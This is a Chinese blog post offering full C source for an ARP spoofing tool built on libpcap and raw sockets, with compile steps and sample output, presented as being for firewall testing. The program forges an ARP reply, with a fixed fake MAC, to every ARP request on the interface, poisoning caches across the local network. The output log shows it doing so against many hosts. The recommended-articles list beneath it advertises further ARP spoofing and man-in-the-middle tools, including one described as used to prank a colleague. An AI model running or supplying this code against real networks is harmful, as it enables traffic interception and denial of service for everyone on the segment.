基于libpcap的ARP欺骗工具

最新推荐文章于 2022-06-16 09:41:57 发布
原创 最新推荐文章于 2022-06-16 09:41:57 发布 · 522 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#libpcap #arp

本文介绍了一个用于防火墙测试的ARP欺骗程序。该程序监听指定网卡上的ARP请求,并构造响应包进行回复。通过模拟生产数据包的方式,帮助测试防火墙对ARP攻击的防御能力。

做这个工具的目的不是为了搞破坏,只是为了做防火墙测试。
由于需要模拟生产数据包,因此需要自己动手写ARP欺骗程序来回应防火墙的ARP询问。
这个程序会一直监听某个网卡,一收到ARP询问就通过rawsocket构造一个ARP回应包发送出去。
本程序有两个部分,一个是收包,基于libpcap;另一个是发包,不依赖任何第三方类库,直接通过rawsocket从链路层开始构造ARP包发出去。

#include <pcap.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/ether.h>
#include <netpacket/packet.h>
#pragma pack(1)

unsigned char p_src_addr[15];   //src_ip buffer
unsigned char p_dst_addr[15];   //dst_ip buffer
unsigned char p_dst_mac[17];    //dst_mac buffer
unsigned char* p_src_mac = "AA:BB:CC:DD:EE:FF";   //defined mac
unsigned char* p_interface;     //interface pointer
unsigned char buffer[8192];     //rawsocket data buffer
int s = -1;		        //socket handler
struct sockaddr_ll sa;          
int offset = 0;                 //rawsocket data offset


u_int16_t handle_ethernet(u_char *args, const struct pcap_pkthdr* pkthdr, const u_char* packet)
{
    struct ether_header *eptr;  /* net/ethernet.h */
    eptr = (struct ether_header *) packet;
    return ntohs(eptr->ether_type);
}

struct myarphdr
{
	unsigned short hw_type;           /* hardware address */
	unsigned short protocol_type;             /* protocol address */
	unsigned char hw_addr_len;       /* length of hardware address */
	unsigned char protocol_addr_len;         /* length of protocol address */
	unsigned short opcode;      /*operate code 1 ask 2 reply*/
	unsigned char src_mac[6];
	struct in_addr src_ip; 
	unsigned char dst_mac[6];
	struct in_addr dst_ip;
	unsigned char padding[18];
};

int setup_eth_header(unsigned char* buffer, unsigned char* src_mac, unsigned char* dst_mac)
{
        char s_mac[6];
        sscanf(src_mac, "%x:%x:%x:%x:%x:%x", &s_mac[0], &s_mac[1], &s_mac[2], &s_mac[3], &s_mac[4], &s_mac[5]);
        char d_mac[6];
        sscanf(dst_mac, "%x:%x:%x:%x:%x:%x", &d_mac[0], &d_mac[1], &d_mac[2], &d_mac[3], &d_mac[4], &d_mac[5]);
        struct ethhdr ethernet_header;
        memcpy(ethernet_header.h_dest, d_mac, 6);
        memcpy(ethernet_header.h_source, s_mac, 6);
        ethernet_header.h_proto = htons(0x0806);
        memcpy(buffer, &ethernet_header, sizeof(struct ethhdr));
        return sizeof(struct ethhdr);
};

int setup_arp_header(unsigned char* buffer, unsigned char* src_mac, unsigned char* dst_mac, unsigned char* src_address, unsigned char* dst_address){
        char s_mac[6];
        sscanf(src_mac, "%x:%x:%x:%x:%x:%x", &s_mac[0], &s_mac[1], &s_mac[2], &s_mac[3], &s_mac[4], &s_mac[5]);
        char d_mac[6];
        sscanf(dst_mac, "%x:%x:%x:%x:%x:%x", &d_mac[0], &d_mac[1], &d_mac[2], &d_mac[3], &d_mac[4], &d_mac[5]);
        struct myarphdr arp_header;
        arp_header.hw_type = htons(0x0001);
        arp_header.protocol_type = htons(0x0800);
        arp_header.hw_addr_len = (unsigned char)6;
        arp_header.protocol_addr_len = (unsigned char)4;
        arp_header.opcode = htons(0x0002);
        memcpy(arp_header.src_mac, s_mac, 6);
        arp_header.src_ip.s_addr = inet_addr(src_address);
        memcpy(arp_header.dst_mac, d_mac, 6);
        arp_header.dst_ip.s_addr = inet_addr(dst_address);
        memset(arp_header.padding,0 , 18);
        memcpy(buffer, &arp_header, sizeof(struct myarphdr));
        return sizeof(struct myarphdr);
}

u_char* handle_arp(u_char *args,const struct pcap_pkthdr* pkthdr,const u_char* packet)
{
	struct ether_header *eptr;
	struct myarphdr *arp;
	
	u_int length = pkthdr->len;
	eptr = (struct ether_header*)packet;
    	arp = (struct myarphdr*)(packet + sizeof(struct ether_header));
    	
	length -= sizeof(struct ether_header); 

    	if (length < sizeof(struct myarphdr))
    	{
        	printf("<somebody has replied!src_mac:%s ",ether_ntoa((const struct ether_addr *)&eptr->ether_shost)); 
		printf("dst_mac:%s\n", ether_ntoa((const struct ether_addr *)&eptr->ether_dhost));
		return NULL;
	}

	if(htons(arp->opcode) == 2){//arp reply
		return NULL;
	}

	memset(p_dst_mac, 0, sizeof(p_dst_mac));
	memcpy(p_dst_mac, ether_ntoa((const struct ether_addr *)&eptr->ether_shost), sizeof(p_dst_mac));

	memset(p_src_addr, 0, sizeof(p_src_addr));
	memset(p_dst_addr, 0, sizeof(p_dst_addr));
	memcpy(p_src_addr, inet_ntoa(arp->dst_ip), sizeof(p_src_addr));
	memcpy(p_dst_addr, inet_ntoa(arp->src_ip), sizeof(p_dst_addr));

        if(s < 0){
		s = socket(PF_PACKET,SOCK_RAW,htons(ETH_P_ALL));
		if(s < 0){
                	printf("Could not open raw socket.\n");
                	exit(-1);
		}
        }
	
        memset(buffer, 0 ,sizeof(buffer));
        offset = 0;
	
        sa.sll_ifindex  = if_nametoindex(p_interface);
	
        offset = setup_eth_header(buffer, p_src_mac, p_dst_mac);
        offset += setup_arp_header(buffer + offset, p_src_mac, p_dst_mac, p_src_addr, p_dst_addr);

        if(sendto(s, buffer, offset, 0, (struct sockaddr *) &sa, sizeof(sa)) < 0){
        	printf("arp send error!\n");
                exit(-1);
        }else{
                printf("[ARP]inter:%s src_mac:%s dsc_mac:%s src_ip:%s dst_ip:%s\n", p_interface, p_src_mac, p_dst_mac, p_src_addr, p_dst_addr);
        }

    return NULL;
}
void my_callback(u_char *args,const struct pcap_pkthdr* pkthdr,const u_char* packet){
	u_int16_t type = handle_ethernet(args, pkthdr, packet);

	if(type == ETHERTYPE_ARP){
		handle_arp(args,pkthdr,packet);
    	}
}

int main (int argc, char* argv[]){
        if(argc < 2){
                printf("usaged:%s interface\n", argv[0]);
                return 0;
        }
	p_interface = argv[1];	

	char ebuf[PCAP_ERRBUF_SIZE];
        /*create capture handler of libpcap*/
	pcap_t *pd = pcap_open_live (argv[1], BUFSIZ, 1, -1, ebuf);
        /*start the loop of capture, loop 5 times, enter printer when capted*/
	pcap_loop (pd, -1, my_callback, NULL);

	pcap_close (pd);

	if(s > 0){
		close(s);
	}
        return 0;
  }

 编译后执行:

[root@cnszxxxx xxxx]# gcc -o arp_trick arp_trick.c -lpcap

 执行效果如下:

[root@cnszxxxx xxxx]# ./arp_trick eth0
[ARP]inter:eth0 src_mac:AA:BB:CC:DD:EE:FF dsc_mac:0:50:56:83:46:c9 src_ip:10.11.77.200 dst_ip:10.11.77.60
somebody has replied!src_mac:0:50:56:83:35:85 dst_mac:0:1d:9:9:bd:53
[ARP]inter:eth0 src_mac:AA:BB:CC:DD:EE:FF dsc_mac:0:50:56:83:52:29 src_ip:10.11.77.200 dst_ip:10.11.77.79
somebody has replied!src_mac:0:50:56:83:35:85 dst_mac:0:50:56:83:2b:cd
[ARP]inter:eth0 src_mac:AA:BB:CC:DD:EE:FF dsc_mac:0:f:1f:69:7b:fa src_ip:10.11.77.43 dst_ip:10.11.77.108
[ARP]inter:eth0 src_mac:AA:BB:CC:DD:EE:FF dsc_mac:0:f:1f:69:7b:fa src_ip:10.11.77.56 dst_ip:10.11.77.108
[ARP]inter:eth0 src_mac:AA:BB:CC:DD:EE:FF dsc_mac:0:50:56:83:16:1c src_ip:10.11.77.40 dst_ip:10.11.77.41
somebody has replied!src_mac:0:50:56:83:35:85 dst_mac:0:50:56:83:16:1c
[ARP]inter:eth0 src_mac:AA:BB:CC:DD:EE:FF dsc_mac:0:1d:9:9:bd:53 src_ip:10.11.77.61 dst_ip:10.11.77.62
[ARP]inter:eth0 src_mac:AA:BB:CC:DD:EE:FF dsc_mac:0:1d:9:9:bd:53 src_ip:10.11.77.40 dst_ip:10.11.77.62
somebody has replied!src_mac:0:50:56:83:35:85 dst_mac:0:1d:9:9:bd:53
 

 

iteye_6223
关注
利用libpcap局域网内抓取arp
max18的专栏
09-07 2862
本人在fedora17下编写、测试正常运行,代码如下:   1 #include   2 #include   3 #include   4   5 //ARP Header,(assuming Ethernet + ip4)   6   7 #define ARP_REQUEST 1   8 #define ARP_REPLY 2   9  10 stru
实验六 基于WinPcap的ARP欺骗实验
DmxExcalibur的博客
07-19 7881
一、 实验目的         掌握 WinPcaP 的安装和配置;         掌握 ARP 协议工作原理和格式;         掌握 WinPcap 发包程序的编写;         掌握防范 ARP 地址欺骗的方法和措施;         了解常用抓包软件,Wireshark、Sniffer Pro 等网络包分析软件的使用。 二、实验设计         1、背景知识
linux下实现ARP欺骗
z1026544682的专栏
09-25 895
linux ettercap+wireshark抓取局域网内其他设备的数据包:https://blog.youkuaiyun.com/u013752202/article/details/78568995/ linux环境实现ARP欺骗:https://blog.youkuaiyun.com/weixin_41983681/article/details/85813498 linux原始套接字抓取网络数据包:https://blog.youkuaiyun.com/haoyuxuanyuan/article/details/10686685
linux下的arp欺骗实现
jtg555的专栏
05-11 1139
       由于毕业设计的需要,我需要在linux下实现arp欺骗,现在将我的一点心得写下来,因为本人目前也在学习中,希望大家广提意见,谢谢!        我使用的是FC6,使用的arp欺骗工具是dsniff.(因为它里面有个很不错的arp欺骗工具)它的下载地址是ftp://ftp.falsehope.com/home/gomez/dsniff/dsniff-2.3-2.i386.rpm   
使用libpcap过滤arp
anyifu6885的博客
07-29 362
上一篇博客简单讲述了libpcap的工作流程及简单使用,今天我们需要做的是继续使用libpcap抓取我们感兴趣的流量,并进行简单的解析: 测试环境是centos 7 下面贴一张arp帧结构图: 下面我们实现的是通过pcap过滤抓取arp报文,解析其中的Ethernet address 和proctocal address并打印出来 分析是arp request还是reply,...
Linux下使用libnet实现ARP攻击
weixin_34294649的博客
11-27 187
2019独角兽企业重金招聘Python工程师标准>>> ...
arp.rar_arp抓包工具_libpcap_libpcap qt_pcap arp_qt 抓包
09-19
标题中的“arp.rar_arp抓包工具_libpcap_libpcap qt_pcap arp_qt 抓包”揭示了我们讨论的主题是关于一个基于libpcap库,并使用Qt框架开发的ARP(Address Resolution Protocol)网络数据包捕获工具。这个工具主要用于...
win-ArpSpoofer:使用 libpcap 和 libnet 为 windows 用 C 语言制作的 Arp 欺骗
05-30
《win-ArpSpoofer:基于libpcap和libnet的C语言实现Windows ARP欺骗工具详解》 在网络安全领域,ARP(Address Resolution Protocol)欺骗是一种常见的攻击手段,它通过篡改网络中的ARP缓存,使得数据包被错误地转发...
基于 libpcap 和 libnet 的 Windows ARP 欺骗器开发
资源摘要信息:"win-ArpSpoofer 是一款使用 C 语言在 Windows 环境下实现 ARP 欺骗工具。该工具的开发涉及到了两个主要的库:libpcap 和 libnet。libpcap 是一个用于网络流量捕获的跨平台库,可以用来捕获网络接口...
基于C语言的ARP欺骗与中间人攻击工具
本项目“基于C语言的ARP欺骗工具(sinarp)”是一个深入网络底层通信机制的实战型网络安全工具,其核心功能建立在对ARP协议的理解与操控之上。ARP(Address Resolution Protocol,地址解析协议)是TCP/IP协议栈中...
基于WinPcap的ARP欺骗实验
07-19
掌握 WinPcaP 的安装和配置; 掌握 ARP 协议工作原理和格式; 掌握 WinPcap 发包程序的编写; 掌握防范 ARP 地址欺骗的方法和措施; 了解常用抓包软件,Wireshark、Sniffer Pro 等网络包分析软件的使用。
linux下主机发现,llinux 下用libpcap发送ARP包实现局域网内主机发现
weixin_28813357的博客
05-12 520
#include #define MAC_BCAST_ADDR (uint8_t *) "\xff\xff\xff\xff\xff\xff"#define ETHER_LEN sizeof(struct eth_header)#define ARP_LEN sizeof(struct arp_header)pcap_t* pcap_handle;char error_content[PCAP...
发送数据包和发arp应答包欺骗别人
weixin_34200628的博客
11-16 256
发送数据包 尽管从 WinPcap 的名字上看,这个库的目标应该是数据捕捉(Packet Capture),然而,它也提供了针对很多其它有用的特性。在其中,我们可以找到一组很完整的用于发送数据包的函数。请注意:原始的libpcap库是不支持发送数据包的,因此,这里展示的函数都属于是WinPcap的扩展,并且它们不能运行于Unix平台下。 使用...
winpcap实现ARP欺骗攻击
Mr_atopos的博客
06-16 2302
使用winpcap实现ARP欺骗
ARP欺骗源代码(基于WinPcap实现)
热门推荐
baggiowangyu的专栏
12-18 1万+
//ArpCheat.h #ifndef MY_ARP_CHEAT_INCLUDE_H #define MY_ARP_CHEAT_INCLUDE_H //字节对齐必须是1 #pragma pack (1) struct ethernet_head { unsigned char dest_mac[6]; //目标主机MAC地址 unsigned char source_mac[
基于Winpcap实现ARP欺骗
劲爆音乐网
09-22 2118
事件起因 某小伙伴太热衷于浏览新闻看网页,常常忘了自己手中的事情,于是做了这个小程序挑逗了一下 实现过程 ARP欺骗有分为2个方向,欺骗网关与欺骗被挑逗者,核心为伪造ARP Reply报文,更新目标主机的ARP缓存表,我这里选择了攻击被挑逗者,伪造网关向被攻击者发生ARP Reply报文,引发被攻击主机更新ARP缓存表 为了让对方有一定上网时间,攻击流程为: 设置休眠间隔10-25分钟 ...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值